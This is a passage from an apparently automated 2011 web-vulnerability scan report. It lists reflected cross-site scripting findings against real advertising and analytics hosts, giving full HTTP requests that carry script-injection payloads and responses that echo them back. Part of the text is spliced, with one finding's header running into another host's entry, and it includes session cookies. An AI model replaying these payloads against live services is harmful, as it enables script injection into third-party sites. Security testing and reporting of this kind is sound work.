on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308e1585<script>alert(1)</script>9de0649acd8", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 67bdb<script>alert(1)</script>2adb1e58fa was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=67bdb<script>alert(1)</script>2adb1e58fa&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"67bdb<script>alert(1)</script>2adb1e58fa", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload e02b4<script>alert(1)</script>82808a089c4 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=e02b4<script>alert(1)</script>82808a089c4&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"e02b4<script>alert(1)</script>82808a089c4", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a47dd<script>alert(1)</script>2e55cdb84e7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=a47dd<script>alert(1)</script>2e55cdb84e7&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"a47dd<script>alert(1)</script>2e55cdb84e7", c6:"", c10:"", c15:"", c16:"", r:""});

3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 714e5<script>alert(1)</script>3108d5897f1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=714e5<script>alert(1)</script>3108d5897f1&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"714e5<script>alert(1)</script>3108d5897f1", c10:"", c15:"", c16:"", r:""});

3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonglobe.tt.omtrdc.net
Path:	/m2/bostonglobe/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 75990<script>alert(1)</script>7536adf48f6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox75990<script>alert(1)</script>7536adf48f6&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:49:13 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 209
Date: Sat, 23 Jul 2011 13:49:12 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox75990<script>alert(1)</script>7536adf48f6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the apui request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b705%3balert(1)//d4158ff9622 was submitted in the apui parameter. This input was echoed as 2b705;alert(1)//d4158ff9622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=12b705%3balert(1)//d4158ff9622 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The value of the trurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab6"><script>alert(1)</script>1e5a96efa2 was submitted in the trurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3Faeab6"><script>alert(1)</script>1e5a96efa2&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dinclinx.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e5f2<script>alert(1)</script>9544fab98de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&3e5f2<script>alert(1)</script>9544fab98de=1 HTTP/1.1
Host: dinclinx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 3e5f2<script>alert(1)</script>9544fab98de

3.54. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload fb0a5<script>alert(1)</script>94af7ff54fd was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&uid=amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd&xy=0%2C0&wh=728%2C90&vchannel=610&cid=acerno&iad=1311428805773-56517315376549960&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=356E3A397C093437191E68EA4107E03E; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 23 Jul 2011 13:49:04 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_10671987fb0a5<script>alert(1)</script>94af7ff54fd");

3.55. http://home.myyearbook.com/Countries [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/Countries

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f199c'-alert(1)-'40bc55a6c60 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAAf199c'-alert(1)-'40bc55a6c60&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

3.65. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b02'-alert(1)-'8ca7da62f17 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..47b02'-alert(1)-'8ca7da62f17&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

3.66. http://ib.adnxs.com/ab [referrer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8205e'-alert(1)-'fa7ea69290f was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

